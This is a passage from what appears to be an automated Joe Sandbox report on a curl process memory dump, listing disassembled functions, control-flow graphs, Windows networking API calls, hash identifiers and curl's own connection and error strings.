                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ConditionInfoMaskVerifyVersion$AddressLibraryLoadProc
                                                                                                                                                                    • String ID: InitSecurityInterfaceA$secur32.dll$security.dll
                                                                                                                                                                    • API String ID: 4152440676-3788156360
                                                                                                                                                                    • Opcode ID: 6e583bc66f8caa567765aa8e950ff16773ae25e7c66c4459c588a34c9acf4d51
                                                                                                                                                                    • Instruction ID: bd12317a5a04a43aa19a959d668f32ec480c8c1e1073c406f1692f5ba654e0a7
                                                                                                                                                                    • Opcode Fuzzy Hash: 6e583bc66f8caa567765aa8e950ff16773ae25e7c66c4459c588a34c9acf4d51
                                                                                                                                                                    • Instruction Fuzzy Hash: 02210770744745BBE720DB619C0AF6B7BDCFB84744F004826F945E61C0DBB0D8058B92
                                                                                                                                                                    Function 001DD9C0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 332COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1223 1dd9c0-1dd9ff 1224 1dda18-1dda6a GetTickCount64 call 2ccc40 1223->1224 1225 1dda01 1223->1225 1231 1dda6c 1224->1231 1232 1dda6f-1dda70 1224->1232 1226 1dda04-1dda17 call 2be5e7 1225->1226 1231->1232 1233 1dda8b 1232->1233 1234 1dda72-1dda73 1232->1234 1235 1dda8f-1ddac6 1233->1235 1236 1dda85-1dda89 1234->1236 1237 1dda75-1dda76 1234->1237 1239 1ddacc-1ddace 1235->1239 1240 1dde17-1dde28 call 1d3960 1235->1240 1236->1235 1237->1235 1238 1dda78-1dda83 1237->1238 1238->1235 1239->1240 1241 1ddad4-1ddad6 1239->1241 1247 1dde2d-1dde3e call 2be5e7 1240->1247 1243 1ddae0-1ddaea 1241->1243 1245 1ddca8 1243->1245 1246 1ddaf0-1ddb03 call 1df690 1243->1246 1248 1ddcac-1ddcb0 1245->1248 1255 1ddb09-1ddb3e 1246->1255 1256 1ddbb3-1ddbb6 1246->1256 1248->1243 1251 1ddcb6-1ddcb8 1248->1251 1251->1247 1254 1ddcbe-1ddcc2 1251->1254 1259 1ddcc4-1ddcda call 1dd5a0 1254->1259 1260 1ddce0-1ddce7 1254->1260 1261 1ddb5b-1ddb5d 1255->1261 1262 1ddb40-1ddb57 call 1d3850 1255->1262 1257 1ddbb8-1ddbca call 1dd530 1256->1257 1258 1ddbe3-1ddbe5 1256->1258 1281 1ddcf8-1ddd2b 1257->1281 1282 1ddbd0-1ddbe1 call 1d3850 1257->1282 1267 1ddbfb-1ddbfd 1258->1267 1268 1ddbe7-1ddbf2 call 1dd530 1258->1268 1259->1226 1259->1260 1265 1ddced-1ddcf3 1260->1265 1266 1dddd9 1260->1266 1261->1267 1270 1ddb63-1ddb66 1261->1270 1262->1261 1271 1ddddf-1dde16 call 1d23b0 call 1d3960 call 2be5e7 1265->1271 1266->1271 1267->1245 1272 1ddc03-1ddc1a WSASetLastError 1267->1272 1283 1ddbf7 1268->1283 1270->1267 1273 1ddb6c-1ddb9f 1270->1273 1272->1245 1279 1ddc20-1ddc26 1272->1279 1273->1267 1280 1ddba1-1ddbb1 call 1dd5a0 1273->1280 1285 1ddc28-1ddc2b 1279->1285 1286 1ddc40-1ddc4c call 208240 1279->1286 1280->1267 1289 1ddd2d-1ddd34 call 1de530 1281->1289 1290 1ddd3f-1ddd4e call 1d9e60 1281->1290 1282->1283 1283->1267 1293 1ddc2d-1ddc3e call 2082e0 1285->1293 1294 1ddc54-1ddc86 call 1d23b0 call 1d3850 1285->1294 1302 1ddc51 1286->1302 1289->1290 1290->1247 1305 1ddd54-1ddd65 1290->1305 1293->1302 1318 1ddc8d-1ddca6 call 1dd5a0 1294->1318 1319 1ddc88-1ddc8b 1294->1319 1302->1294 1309 1ddd67-1dddac GetTickCount64 call 2ccc40 call 1dfe40 1305->1309 1310 1dddb0-1dddb9 call 1dd7c0 1305->1310 1309->1310 1317 1dddbe-1dddd8 call 1d9ef0 call 2be5e7 1310->1317 1318->1248 1319->1318
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • Connection time-out, xrefs: 001DDE17
                                                                                                                                                                    • Failed to connect to %s port %ld: %s, xrefs: 001DDDF0
                                                                                                                                                                    • Connection failed, xrefs: 001DDBD0
                                                                                                                                                                    • After %ldms connect time, move on!, xrefs: 001DDB41
                                                                                                                                                                    • connect to %s port %ld failed: %s, xrefs: 001DDC69
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Count64Tick
                                                                                                                                                                    • String ID: After %ldms connect time, move on!$Connection failed$Connection time-out$Failed to connect to %s port %ld: %s$connect to %s port %ld failed: %s
                                                                                                                                                                    • API String ID: 1927824332-885759404
                                                                                                                                                                    • Opcode ID: f9967665f1113c0a5002a5f8d765f749762b94db6d81a6d8f48fe608bdb66da2
                                                                                                                                                                    • Instruction ID: aceb721078094b8e059c4ccda4ebd75dee5c9d0b0acc6d7e915fab045eb6d263
                                                                                                                                                                    • Opcode Fuzzy Hash: f9967665f1113c0a5002a5f8d765f749762b94db6d81a6d8f48fe608bdb66da2
                                                                                                                                                                    • Instruction Fuzzy Hash: A7C1E3716047419FC708DF28E885AAEB7E5BF95308F04462EF85A8B381DB70ED15CB92
                                                                                                                                                                    Function 001DFA40 Relevance: 13.8, APIs: 9, Instructions: 283networkCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1328 1dfa40-1dfa83 1329 1dfbfe-1dfc00 1328->1329 1330 1dfa89-1dfa8b 1328->1330 1332 1dfded 1329->1332 1333 1dfc06 1329->1333 1330->1329 1331 1dfa91-1dfa95 1330->1331 1337 1dfa97-1dfa9a 1331->1337 1338 1dfaa1-1dfaa3 1331->1338 1334 1dfdef-1dfe07 call 2be5e7 1332->1334 1335 1dfc0c-1dfc11 WSASetLastError 1333->1335 1336 1dfde6-1dfde7 Sleep 1333->1336 1339 1dfc17-1dfc1a 1335->1339 1336->1332 1337->1331 1341 1dfa9c 1337->1341 1342 1dfad9-1dfaf6 1338->1342 1343 1dfaa5-1dfad5 GetTickCount64 call 2ccc40 1338->1343 1339->1334 1341->1329 1346 1dfb04-1dfb15 1342->1346 1343->1342 1347 1dfb1b-1dfb2a 1346->1347 1348 1dfbe5-1dfbe8 1346->1348 1350 1dfbe1 1347->1350 1351 1dfb30-1dfb3f 1347->1351 1352 1dfbee-1dfbf4 1348->1352 1353 1dfb00 1348->1353 1350->1348 1354 1dfb68-1dfb6b 1351->1354 1355 1dfb41-1dfb45 1351->1355 1356 1dfc1f-1dfc2f 1352->1356 1357 1dfbf6-1dfbf8 1352->1357 1353->1346 1361 1dfb6d-1dfb71 1354->1361 1362 1dfba0-1dfba6 1354->1362 1359 1dfb47-1dfb4b 1355->1359 1360 1dfb52-1dfb54 1355->1360 1358 1dfc33-1dfc35 1356->1358 1357->1356 1363 1dfbfa-1dfbfc 1357->1363 1367 1dfc68 1358->1367 1368 1dfc37-1dfc66 1358->1368 1359->1360 1366 1dfb4d-1dfb50 1359->1366 1360->1354 1369 1dfb56-1dfb59 1360->1369 1370 1dfb81-1dfb83 1361->1370 1371 1dfb73-1dfb7a 1361->1371 1364 1dfbdd 1362->1364 1365 1dfba8-1dfbac 1362->1365 1363->1329 1363->1356 1364->1350 1372 1dfbbe-1dfbc0 1365->1372 1373 1dfbae 1365->1373 1366->1359 1366->1360 1374 1dfc7a-1dfcae select 1367->1374 1375 1dfc6a-1dfc72 1367->1375 1368->1374 1369->1354 1376 1dfb5b-1dfb64 1369->1376 1370->1362 1378 1dfb85-1dfb88 1370->1378 1371->1370 1377 1dfb7c-1dfb7f 1371->1377 1372->1364 1380 1dfbc2-1dfbc5 1372->1380 1379 1dfbb0-1dfbb7 1373->1379 1381 1dfd65-1dfd67 1374->1381 1382 1dfcb4-1dfcbc WSAGetLastError 1374->1382 1375->1374 1376->1354 1377->1370 1377->1371 1378->1362 1383 1dfb8a-1dfb99 1378->1383 1379->1372 1385 1dfbb9-1dfbbc 1379->1385 1380->1364 1386 1dfbc7-1dfbd6 1380->1386 1381->1339 1384 1dfd6d 1381->1384 1387 1dfcbe-1dfcc5 1382->1387 1388 1dfcd6-1dfcd8 1382->1388 1383->1362 1384->1332 1389 1dfd73-1dfd82 1384->1389 1385->1372 1385->1379 1386->1364 1387->1339 1390 1dfccb-1dfcd0 1387->1390 1391 1dfcda-1dfcf0 1388->1391 1392 1dfcf5-1dfd44 GetTickCount64 call 2ccc40 1388->1392 1393 1dfd86-1dfd91 1389->1393 1390->1339 1390->1388 1391->1358 1392->1332 1398 1dfd4a-1dfd60 1392->1398 1395 1dfddc-1dfde0 1393->1395 1396 1dfd93-1dfd9d __WSAFDIsSet 1393->1396 1395->1393 1401 1dfde2-1dfde4 1395->1401 1399 1dfd9f-1dfda4 1396->1399 1400 1dfda7-1dfdb6 __WSAFDIsSet 1396->1400 1398->1358 1399->1400 1402 1dfdbc-1dfdcb __WSAFDIsSet 1400->1402 1403 1dfdb8 1400->1403 1401->1334 1404 1dfdcd-1dfdd2 1402->1404 1405 1dfdd5-1dfdd9 1402->1405 1403->1402 1404->1405 1405->1395 1406 1dfddb 1405->1406 1406->1395
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 001DFAA9
                                                                                                                                                                    • WSASetLastError.WS2_32(00002726,00000000,00000000), ref: 001DFC11
                                                                                                                                                                    • select.WS2_32(?,?,?,?,?), ref: 001DFCA5
                                                                                                                                                                    • WSAGetLastError.WS2_32(?,000003E8,00000000), ref: 001DFCB4
                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 001DFCF5
                                                                                                                                                                    • __WSAFDIsSet.WS2_32(?,?), ref: 001DFD99
                                                                                                                                                                    • __WSAFDIsSet.WS2_32(?,?), ref: 001DFDB2
                                                                                                                                                                    • __WSAFDIsSet.WS2_32(?,?), ref: 001DFDC7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Count64ErrorLastTick$select
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2692648663-0
                                                                                                                                                                    • Opcode ID: 11666d99bf59c7a4003f8cc4c0d8fa4d3e1ebecab7604e870aa2acf6d987d0bd
                                                                                                                                                                    • Instruction ID: 4316c04a78b5499fef2a2a4a9f28c6f98bffe2cf14f1e1c6b6d2d6f2c9df8afd
                                                                                                                                                                    • Opcode Fuzzy Hash: 11666d99bf59c7a4003f8cc4c0d8fa4d3e1ebecab7604e870aa2acf6d987d0bd
                                                                                                                                                                    • Instruction Fuzzy Hash: 07A194715087058BD7299F28D89476EB6E9EF88710F554A3FE88AC7390D730DE42CB42
                                                                                                                                                                    Function 001D3D70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastrecv
                                                                                                                                                                    • String ID: 3'$Recv failure: %s
                                                                                                                                                                    • API String ID: 2514157807-3205223812
                                                                                                                                                                    • Opcode ID: 050e0376034552fcf89acc7546c72b1cd3934997eb11e8c52f81621045da0c11
                                                                                                                                                                    • Instruction ID: 7b856d2363fdc3cb48fb764d6023c5a0fdd340e40220826170b3aab930b6b465
                                                                                                                                                                    • Opcode Fuzzy Hash: 050e0376034552fcf89acc7546c72b1cd3934997eb11e8c52f81621045da0c11
                                                                                                                                                                    • Instruction Fuzzy Hash: 7D01AD72301204AFCB105FA9EC48A9ABBE4FB88726F104176FA5897391C7329D209F41
                                                                                                                                                                    Function 002D65B9 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,00000055,?,?,002C7125,?,?,?,?,00000004,?,00000000), ref: 002D6697
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0,%q,,00000000,?), ref: 002D67D5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CodeInfoLocalePageValid
                                                                                                                                                                    • String ID: %q,
                                                                                                                                                                    • API String ID: 790303815-3309009229
                                                                                                                                                                    • Opcode ID: d7504d1ec12c98e2fdf1f6ebfd485f0ca552c759e69991ea4e2e3dd69d76e482
                                                                                                                                                                    • Instruction ID: 58d4757495893f71dbf261f37bcffa6485963507cea1933489322ff12d8d773d
                                                                                                                                                                    • Opcode Fuzzy Hash: d7504d1ec12c98e2fdf1f6ebfd485f0ca552c759e69991ea4e2e3dd69d76e482
                                                                                                                                                                    • Instruction Fuzzy Hash: 2961D871620707AAEB24AF74DC4AFB6739CEF04754F14042BF945DB381EA74ED608AA0
                                                                                                                                                                    Function 001C930A Relevance: 35.3, APIs: 1, Strings: 19, Instructions: 344COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 0 1c930a-1c9311 1 1c9316-1c931d 0->1 2 1c931f-1c9323 1->2 3 1c9325-1c9328 1->3 2->3 4 1c932a-1c9335 2->4 3->1 3->4 5 1c933c-1c9347 call 1c1a10 4->5 6 1c9337-1c933a 4->6 7 1c934a-1c9369 call 2bfa48 call 1c19f0 call 2c4d21 5->7 6->5 6->7 16 1c93ab-1c93b3 7->16 17 1c936b-1c938a ioctlsocket 7->17 21 1c93b5-1c93bc 16->21 22 1c93c3-1c93d8 call 1ce200 16->22 17->16 18 1c938c-1c93a8 call 2be62a call 2c19b6 call 1c1a10 17->18 18->16 21->22 28 1c93da-1c93ef call 1ce200 22->28 29 1c93f1-1c93f7 22->29 28->29 35 1c9417-1c9422 28->35 34 1c93f9-1c940d call 2c49ac call 2d73d2 29->34 29->35 34->35 45 1c940f-1c9415 34->45 38 1c9425-1c9463 call 1cf8e0 35->38 47 1c947e-1c9500 call 2c1560 call 2c0690 call 2beb50 call 1cf7a0 38->47 48 1c9465-1c9478 call 1cf8c0 38->48 45->38 65 1cb292-1cb296 47->65 48->47 66 1cb29c-1cb2cb call 1cf8e0 65->66 67 1c9023-1c9025 65->67 66->67 82 1cb2d1-1cb2eb call 1cf8e0 66->82 69 1c904c-1c9064 call 2c0e47 67->69 70 1c9027-1c902e 67->70 81 1c9069-1c906e 69->81 70->69 73 1c9030-1c9041 70->73 73->69 79 1c9043-1c9049 call 2c49ac 73->79 79->69 85 1c908e-1c9097 81->85 86 1c9070-1c908b call 1cf8e0 81->86 82->69 88 1c9099-1c909f 85->88 89 1c90aa-1c90ca 85->89 86->85 88->89 91 1c90a1-1c90a7 call 2be832 88->91 92 1c90cc-1c90d2 call 2be832 89->92 93 1c90d5-1c90db 89->93 91->89 92->93 98 1c90dd-1c90e3 call 2be832 93->98 99 1c90e6-1c90eb 93->99 98->99 103 1c90ed-1c90f6 call 2cbfe2 99->103 104 1c90f9-1c910d call 1c8830 99->104 103->104 111 1cb3da-1cb3e0 104->111 112 1c9113-1c911b 104->112 113 1cb3eb-1cb3f4 111->113 114 1cb3e2-1cb3e8 call 2be832 111->114 112->111 115 1c9121-1c9133 112->115 117 1cb3fb-1cb414 call 1c8830 113->117 118 1cb3f6 call 1c2610 113->118 114->113 115->111 119 1c9139-1cb3d4 115->119 131 1cb45d-1cb463 117->131 132 1cb416-1cb427 117->132 118->117 119->111 124 1c8e00-1c8e85 call 2bfa48 call 2c49ac call 2bfa48 call 2da5e9 119->124 124->65 135 1cb46e-1cb477 131->135 136 1cb465-1cb46b call 2be832 131->136 132->131 133 1cb429-1cb430 132->133 143 1c8cec-1c8cee 133->143 144 1c8cf0-1c8d0b call 1c26a0 133->144 140 1cb47e-1cb4f2 call 2be832 * 3 135->140 141 1cb479 call 1c2610 135->141 136->135 181 1cb4f4-1cb4fb 140->181 182 1cb502-1cb514 140->182 141->140 143->144 150 1c8d4c-1c8db1 143->150 164 1c8d1d-1c8d27 144->164 165 1c8d0d-1c8d1a call 1c1b70 144->165 161 1c8dc5-1c8df4 150->161 162 1c8db3-1c8dc3 call 2c4d21 150->162 161->111 176 1c8dfa 161->176 162->161 164->131 166 1c8d2d 164->166 165->164 166->150 176->124 181->182 183 1cb552 181->183 182->183
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • [%lu/%lu]: %s --> %s, xrefs: 001C944B
                                                                                                                                                                    • ://, xrefs: 001C9489
                                                                                                                                                                    • https://, xrefs: 001C93DE
                                                                                                                                                                    • <stdout>, xrefs: 001C9436, 001C9442
                                                                                                                                                                    • %s%c%s, xrefs: 001C94D6
                                                                                                                                                                    • http://, xrefs: 001C93C7
                                                                                                                                                                    • Uh, xrefs: 001C9086
                                                                                                                                                                    • ?, xrefs: 001C9497
                                                                                                                                                                    • out of memory, xrefs: 001C8D0D
                                                                                                                                                                    • %s%s, xrefs: 001C946B
                                                                                                                                                                    • -N, xrefs: 001C93CE
                                                                                                                                                                    • Using --anyauth or --proxy-anyauth with upload from stdin involves a big risk of it not working. Use a temporary file or a fixed auth type instead!, xrefs: 001C933C
                                                                                                                                                                    • If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like, xrefs: 001CB2D1
                                                                                                                                                                    • %s%s, xrefs: 001CB2DB
                                                                                                                                                                    • curl: (%d) %s, xrefs: 001CB2B8
                                                                                                                                                                    • fcntl failed on fd=%d: %s, xrefs: 001C939D
                                                                                                                                                                    • --_curl_--, xrefs: 001C9466
                                                                                                                                                                    • (%d) Failed writing body, xrefs: 001C907E
                                                                                                                                                                    • More details here: http://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate f, xrefs: 001CB2D6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
